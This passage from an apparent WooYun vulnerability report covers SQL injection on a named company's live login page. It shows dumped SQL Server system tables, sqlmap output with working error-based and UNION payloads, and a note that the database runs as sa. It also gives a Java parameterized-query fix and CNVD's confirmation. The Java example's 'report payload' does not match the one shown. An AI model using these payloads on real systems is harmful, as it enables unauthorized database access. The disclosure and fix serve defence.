| sysmail_mailattachments |
| sysmail_mailitems |
| sysmail_principalprofile |
| sysmail_profileaccount |
| sysmail_profileaccount |
| sysmail_query_transfer |
| sysmail_send_retries |
| sysmail_sentitems |
| sysmail_server |
| sysmail_servertype |
| sysmail_unsentitems |
| sysmaintplan_logdetail |
| sysmaintplan_logdetail |
| sysmaintplan_plans |
| sysmaintplan_subplans |
| sysnotifications |
| sysoperators |
| sysoriginatingservers_view |
| sysoriginatingservers_view |
| sysproxies |
| sysproxylogin |
| sysproxyloginsubsystem_view |
| sysproxysubsystem |
| sysschedules_localserver_view |
| sysschedules_localserver_view |
| syssessions |
| syssubsystems |
| systargetservergroupmembers |
| systargetservergroups |
| systargetservers_view |
| systargetservers_view |
| systaskids |
+---------------------------------------------------+
The current database user is sa, the built-in SQL Server sysadmin login, so the impact is not limited to reading the application's data.
The vendor's own site has just as many tables, so I did not dump them; here is the proof only.
C:\Python27\SqlMap>sqlmap.py -u "http://www.flcit.com/Login!showLogin.do" --forms

sqlmap {1.0-dev-nongit-20150313}  http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 10:24:28

[10:24:28] [INFO] testing connection to the target URL
[10:24:28] [INFO] searching for forms
[#1] form:
POST http://www.flcit.com:80/Login!singleSysChkLogin.do
POST data: loginType=0&userName=&toLogin.x=1&toLogin.y=1&toLogin=%20&password=&rememberCookie=0&rememberPwd=1
do you want to test this form? [Y/n/q]
>
Edit POST data [default: loginType=0&userName=&toLogin.x=1&toLogin.y=1&toLogin=%20&password=&rememberCookie=0&rememberPwd=1] (Warning: blank fields detected):
do you want to fill blank fields with random values? [Y/n]
[10:24:31] [INFO] resuming back-end DBMS 'microsoft sql server'
[10:24:31] [INFO] using 'C:\Users\Administrator\.sqlmap\output\results-03292015_1024am.csv' as the CSV results file in multiple targets mode
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: userName (POST)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: loginType=0&userName=nZza' AND 3280=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(113)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (3280=3280) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(113)+CHAR(118)+CHAR(113))) AND 'xBqv'='xBqv&toLogin.x=1&toLogin.y=1&toLogin=%20&password=XHxX&rememberCookie=0&rememberPwd=1

    Type: UNION query
    Title: Generic UNION query (NULL) - 13 columns
    Payload: loginType=0&userName=nZza' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(112)+CHAR(113)+CHAR(112)+CHAR(113)+CHAR(122)+CHAR(100)+CHAR(81)+CHAR(66)+CHAR(75)+CHAR(74)+CHAR(120)+CHAR(105)+CHAR(97)+CHAR(112)+CHAR(113)+CHAR(98)+CHAR(113)+CHAR(118)+CHAR(113),NULL,NULL,NULL,NULL,NULL-- &toLogin.x=1&toLogin.y=1&toLogin=%20&password=XHxX&rememberCookie=0&rememberPwd=1
---
do you want to exploit this SQL injection? [Y/n]
[10:24:33] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2005
[10:24:33] [INFO] you can find results of scanning in multiple targets mode inside the CSV file 'C:\Users\Administrator\.sqlmap\output\results-03292015_1024am.csv'

[*] shutting down at 10:24:33
Fix:
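The report leaves the fix blank; the fix is parameterization. The Java below is an added example, not the vendor's code (the page shows none of the application's source). It assumes a login handler that concatenates userName and password into a query against tbl_User (a table present in the dumped schema; the UserID, UserName and Password column names are assumptions), shows the statement the report's error-based payload turns that query into, and gives the PreparedStatement form that stops it.

```java
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.sql.Statement;

/*
 * Added illustration, not code from the reported product. tbl_User is in the
 * dumped schema; the column names and the query shape are assumptions chosen
 * to reproduce the injection sqlmap found on the userName parameter.
 */
public class LoginQuery {

    /** Builds the statement the way a string-concatenating login handler would. */
    static String buildVulnerableSql(String userName, String password) {
        return "SELECT UserID FROM tbl_User WHERE UserName = '" + userName
                + "' AND Password = '" + password + "'";
    }

    /** Vulnerable: whatever arrives in userName is parsed as SQL. */
    static boolean vulnerableLogin(Connection conn, String userName, String password)
            throws SQLException {
        try (Statement st = conn.createStatement();
             ResultSet rs = st.executeQuery(buildVulnerableSql(userName, password))) {
            return rs.next();
        }
    }

    /**
     * Hardened: the SQL text is constant and the values are bound as typed
     * parameters, so a quote, CONVERT() or UNION inside userName is compared
     * as a literal string and never reaches the parser. (Password hashing is
     * a separate concern and is not shown here.)
     */
    static boolean safeLogin(Connection conn, String userName, String password)
            throws SQLException {
        String sql = "SELECT UserID FROM tbl_User WHERE UserName = ? AND Password = ?";
        try (PreparedStatement ps = conn.prepareStatement(sql)) {
            ps.setString(1, userName);
            ps.setString(2, password);
            try (ResultSet rs = ps.executeQuery()) {
                return rs.next();
            }
        }
    }

    public static void main(String[] args) {
        // The report's error-based payload, URL-decoded (CHAR() chains left as sent).
        String injected = "请输入用户名' AND 1185=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(106)"
                + "+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (1185=1185) THEN CHAR(49) ELSE CHAR(48) END))"
                + "+CHAR(113)+CHAR(107)+CHAR(113)+CHAR(107)+CHAR(113))) AND 'OavH'='OavH";

        // Benign input: the statement looks the way the developer expected.
        System.out.println(buildVulnerableSql("test", "888888"));

        // Injected input: the attacker's CONVERT(INT, ...) now runs inside the WHERE
        // clause. SQL Server 2005 fails it with "Conversion failed when converting the
        // varchar value 'qqjjq1qkqkq' to data type int.", and because that error text
        // reaches the HTTP response, sqlmap reads the CASE result (and later any column
        // value placed in the same spot) straight out of the page.
        System.out.println(buildVulnerableSql(injected, "XVvI"));
    }
}
```

Two further points the sqlmap output supports: the application connects as sa, so any injection that remains runs with sysadmin rights and the data-source login should be replaced by one limited to the application's own databases; and the error-based technique only works because the SQL Server error text reaches the client, so database exceptions should be logged server-side and answered with a generic error page. Neither measure replaces the parameterized query.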
Copyright notice: please credit the source when reposting. Bear baby@WooYun
Vulnerability response
Vendor response:
Severity: Medium
Vulnerability rank: 8
Confirmed: 2015-04-03 16:10
Vendor reply:
CNVD has confirmed and reproduced the described issue and has passed it through CNCERT to the Fujian branch, which will coordinate handling with the site operators.
Latest status:
None yet